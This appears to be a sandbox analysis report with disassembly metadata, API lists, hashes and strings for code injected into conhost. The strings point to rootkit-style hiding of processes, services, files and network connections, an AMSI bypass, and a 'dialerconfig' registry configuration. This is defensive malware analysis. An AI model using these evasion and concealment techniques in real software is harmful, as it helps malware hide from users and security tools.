                                                                  control_flow_graph 205 2408a292bf4-2408a292c6d 207 2408a292f88-2408a292fab 205->207 208 2408a292c73-2408a292c79 205->208 208->207 209 2408a292c7f-2408a292c82 208->209 209->207 210 2408a292c88-2408a292c8b 209->210 210->207 211 2408a292c91-2408a292ca1 GetModuleHandleA 210->211 212 2408a292ca3-2408a292cb3 GetProcAddress 211->212 213 2408a292cb5 211->213 214 2408a292cb8-2408a292cd6 212->214 213->214 214->207 216 2408a292cdc-2408a292cfb StrCmpNIW 214->216 216->207 217 2408a292d01-2408a292d05 216->217 217->207 218 2408a292d0b-2408a292d15 217->218 218->207 219 2408a292d1b-2408a292d22 218->219 219->207 220 2408a292d28-2408a292d3b 219->220 221 2408a292d4b 220->221 222 2408a292d3d-2408a292d49 220->222 223 2408a292d4e-2408a292d52 221->223 222->223 224 2408a292d62 223->224 225 2408a292d54-2408a292d60 223->225 226 2408a292d65-2408a292d6f 224->226 225->226 227 2408a292e55-2408a292e59 226->227 228 2408a292d75-2408a292d78 226->228 231 2408a292f7a-2408a292f82 227->231 232 2408a292e5f-2408a292e62 227->232 229 2408a292d8a-2408a292d94 228->229 230 2408a292d7a-2408a292d87 call 2408a291934 228->230 234 2408a292dc8-2408a292dd2 229->234 235 2408a292d96-2408a292da3 229->235 230->229 231->207 231->220 236 2408a292e73-2408a292e7d 232->236 237 2408a292e64-2408a292e70 call 2408a291934 232->237 243 2408a292e02-2408a292e05 234->243 244 2408a292dd4-2408a292de1 234->244 235->234 242 2408a292da5-2408a292db2 235->242 239 2408a292ead-2408a292eb0 236->239 240 2408a292e7f-2408a292e8c 236->240 237->236 249 2408a292ebd-2408a292eca lstrlenW 239->249 250 2408a292eb2-2408a292ebb call 2408a291bc8 239->250 240->239 248 2408a292e8e-2408a292e9b 240->248 251 2408a292db5-2408a292dbb 242->251 246 2408a292e13-2408a292e20 lstrlenW 243->246 247 2408a292e07-2408a292e11 call 2408a291bc8 243->247 244->243 252 2408a292de3-2408a292df0 244->252 255 2408a292e33-2408a292e45 call 2408a293c74 246->255 256 2408a292e22-2408a292e31 call 2408a291c00 246->256 247->246 258 2408a292e4b-2408a292e50 247->258 254 2408a292e9e-2408a292ea4 248->254 260 2408a292edd-2408a292ee7 call 2408a293c74 249->260 261 2408a292ecc-2408a292edb call 2408a291c00 249->261 250->249 266 2408a292ef2-2408a292efd 250->266 251->258 259 2408a292dc1-2408a292dc6 251->259 262 2408a292df3-2408a292df9 252->262 254->266 267 2408a292ea6-2408a292eab 254->267 255->258 271 2408a292eea-2408a292eec 255->271 256->255 256->258 258->271 259->234 259->251 260->271 261->260 261->266 262->258 264 2408a292dfb-2408a292e00 262->264 264->243 264->262 274 2408a292eff-2408a292f03 266->274 275 2408a292f74-2408a292f78 266->275 267->239 267->254 271->231 271->266 279 2408a292f0b-2408a292f25 call 2408a2989f0 274->279 280 2408a292f05-2408a292f09 274->280 275->231 281 2408a292f28-2408a292f2b 279->281 280->279 280->281 284 2408a292f2d-2408a292f4b call 2408a2989f0 281->284 285 2408a292f4e-2408a292f51 281->285 284->285 285->275 287 2408a292f53-2408a292f71 call 2408a2989f0 285->287 287->275
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                  • API String ID: 2119608203-3850299575
                                                                  • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction ID: c765a4f013e48caad2c330f221094fb91a40caba9c5bd62ab6d77f4cb9508628
                                                                  • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction Fuzzy Hash: D0B16E7231069182EB759F2AD688BAABBA8F744F84F585016EF4953F94DB34DDC0CB40
                                                                  Function 000002408A2981C0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 3140674995-0
                                                                  • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction ID: 04c331b0691764d5ca24158a2842f217291fbd7bedd16f2503b57e6b41f6b301
                                                                  • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction Fuzzy Hash: B6311C72305B808AEB709F65E8947DA7764F794B44F48442ADB4E47A98DF38C588CB10
                                                                  Function 000002408A29D6D4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 1239891234-0
                                                                  • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction ID: 13fb4ef1d9da1cd713a0941815fd9a6c8405a18c464eaece96056fddbba0f3c4
                                                                  • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction Fuzzy Hash: 1A313D36314B8086DB608F2AE98479E77A4F788B54F540216EB9D43F99DF38C196CB00
                                                                  Function 000002408A297D90 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                  • String ID:
                                                                  • API String ID: 2933794660-0
                                                                  • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction ID: ffa174e198c7cbdde9477c3ca9fd96983d377114fcc421d62661ed797c204035
                                                                  • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction Fuzzy Hash: EB115E32710F008AEB10CF65E8883A833A4F318768F040E21EF6D42FA4DB78D1E58780
                                                                  Function 000002408A29E110 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 223b01cd0f930ae752de15cad39410bfb9f0e3b9a5322d2e97186d94b51f497c
                                                                  • Instruction ID: d42af565174c3eefed0d35b29dc0076035e1cb4af492d8a6cc6267ab02a203d9
                                                                  • Opcode Fuzzy Hash: 223b01cd0f930ae752de15cad39410bfb9f0e3b9a5322d2e97186d94b51f497c
                                                                  • Instruction Fuzzy Hash: 3651B33270079099FB309B7BAA88A9F7FA5B744B94F184215EF5927E95DB38C491CB00
                                                                  Function 0000024089953B20 Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cae390c6a42f7aa34880c2341c4c444ed621bc792ca3f489e9df2915f57af0cb
                                                                  • Instruction ID: c67dd963b3d750ad12bde0fdc99c5ae1ed9655487f0c93fb355788bed241829b
                                                                  • Opcode Fuzzy Hash: cae390c6a42f7aa34880c2341c4c444ed621bc792ca3f489e9df2915f57af0cb
                                                                  • Instruction Fuzzy Hash: 05F01271B156948EDBA99F2CA94771A77E1F358384FD4811AE7C9C3B14D63C84A1CF04
                                                                  Function 000002408A291628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                  • API String ID: 2135414181-2879589442
                                                                  • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction ID: 7ca1741dd716dac20cc6041481acbb2c191fd386f35fa871a9dbe7236b02502e
                                                                  • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction Fuzzy Hash: F571E936710A2186EB60DF6BE998A9A37A4F784F88F451111DF4E57F69DF34C484CB40
                                                                  Function 000002408A291D40 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 000002408A291D4B
                                                                    • Part of subcall function 000002408A2920C4: GetModuleHandleA.KERNEL32(?,?,?,000002408A291D7D), ref: 000002408A2920DC
                                                                    • Part of subcall function 000002408A2920C4: GetProcAddress.KERNEL32(?,?,?,000002408A291D7D), ref: 000002408A2920ED
                                                                    • Part of subcall function 000002408A295F60: GetCurrentThreadId.KERNEL32 ref: 000002408A295F9B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                  • API String ID: 4175298099-4225371247
                                                                  • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction ID: 4b6949b511a17a93cf531f62de2fa13893cb13f11e601c96369a4066e8bf6214
                                                                  • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction Fuzzy Hash: B541D8B4300A1AA1FB24EB5FEAD9BD57721B710B54FC81513970903DB1AE7892CECB60
                                                                  Function 000002408A2912BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                  • String ID: d
                                                                  • API String ID: 2005889112-2564639436
                                                                  • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction ID: 7b9880a0304c11a639402dd2a4da6be2d71d15f03c511fe4b11c21f3a6ed6954
                                                                  • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction Fuzzy Hash: D7511936704B9486EB64CF6BE68C75ABBA1F788F99F044124DF4907B58DF38D0898B00
                                                                  Function 0000024089946D40 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID: destructor'$ned$restrict(
                                                                  • API String ID: 190073905-924718728
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: a966c86bd3bd2c5ad5e125b4be24deb95fc7661c0ebede70505280159aed00ce
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: A181F761E016458AFB63BB6E9BCD39A27D0BB95780F444025BBC947797DB38C8C78708
                                                                  Function 000002408A29D258 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 158 2408a29d258-2408a29d27a GetLastError 159 2408a29d299-2408a29d2a4 FlsSetValue 158->159 160 2408a29d27c-2408a29d287 FlsGetValue 158->160 163 2408a29d2ab-2408a29d2b0 159->163 164 2408a29d2a6-2408a29d2a9 159->164 161 2408a29d289-2408a29d291 160->161 162 2408a29d293 160->162 165 2408a29d305-2408a29d310 SetLastError 161->165 162->159 166 2408a29d2b5 call 2408a29dafc 163->166 164->165 168 2408a29d312-2408a29d324 165->168 169 2408a29d325-2408a29d33b call 2408a29cb78 165->169 167 2408a29d2ba-2408a29d2c6 166->167 170 2408a29d2d8-2408a29d2e2 FlsSetValue 167->170 171 2408a29d2c8-2408a29d2cf FlsSetValue 167->171 180 2408a29d358-2408a29d363 FlsSetValue 169->180 181 2408a29d33d-2408a29d348 FlsGetValue 169->181 174 2408a29d2f6-2408a29d300 call 2408a29cfc4 call 2408a29db74 170->174 175 2408a29d2e4-2408a29d2f4 FlsSetValue 170->175 173 2408a29d2d1-2408a29d2d6 call 2408a29db74 171->173 173->164 174->165 175->173 186 2408a29d3c8-2408a29d3cf call 2408a29cb78 180->186 187 2408a29d365-2408a29d36a 180->187 184 2408a29d34a-2408a29d34e 181->184 185 2408a29d352 181->185 184->186 189 2408a29d350 184->189 185->180 191 2408a29d36f call 2408a29dafc 187->191 192 2408a29d3bf-2408a29d3c7 189->192 194 2408a29d374-2408a29d380 191->194 195 2408a29d392-2408a29d39c FlsSetValue 194->195 196 2408a29d382-2408a29d389 FlsSetValue 194->196 198 2408a29d39e-2408a29d3ae FlsSetValue 195->198 199 2408a29d3b0-2408a29d3ba call 2408a29cfc4 call 2408a29db74 195->199 197 2408a29d38b-2408a29d390 call 2408a29db74 196->197 197->186 198->197 199->192
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D267
                                                                  • FlsGetValue.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D27C
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D29D
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D2CA
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D2DB
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D2EC
                                                                  • SetLastError.KERNEL32(?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D307
                                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D33D
                                                                  • FlsSetValue.KERNEL32(?,?,00000001,000002408A29F0FC,?,?,?,?,000002408A29C3CF,?,?,?,?,?,000002408A297EE0), ref: 000002408A29D35C
                                                                    • Part of subcall function 000002408A29DAFC: HeapAlloc.KERNEL32(?,?,00000000,000002408A29D432,?,?,?,000002408A29DAE5,?,?,?,?,000002408A29DBA8), ref: 000002408A29DB51
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D384
                                                                    • Part of subcall function 000002408A29DB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002408A29643A), ref: 000002408A29DB8A
                                                                    • Part of subcall function 000002408A29DB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002408A29643A), ref: 000002408A29DB94
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D395
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002408A2A0E9B,?,?,?,000002408A2A088C,?,?,?,000002408A29CC7F), ref: 000002408A29D3A6
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 570795689-0
                                                                  • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction ID: 018e45ed5d0ed26c29d58a38f4c483b10dcb84a5632e802c6b367016c1ffb8cc
                                                                  • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction Fuzzy Hash: A0412C3074525442F9B8A73F97DDBAB2A465B45BB0F1C0B249F3606ED7DA7894C29E00
                                                                  Function 000002408A292FAC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                  • API String ID: 1943346504-1805530042
                                                                  • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction ID: c7feb7eedf3b9f8621111a5b22029b9d0b2d99cae8fab2b120657999524fec73
                                                                  • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction Fuzzy Hash: 1E318432700A5086F730CF2BAA8C75AA7A0F788F95F4845299F4943E65DF38D4A68B40
                                                                  Function 000002408A2930BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                  • API String ID: 1943346504-3507739905
                                                                  • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction ID: bf10483d32a2d2cf22a671d4f479baa62898e7a4f68aa7f43a9cd7687d0f8bb7
                                                                  • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction Fuzzy Hash: 62314D31714B5186F760DF2BAACCB5AA7A1F784F95F084129DF8A43B25DF38D4968B00
                                                                  Function 0000024089949D74 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
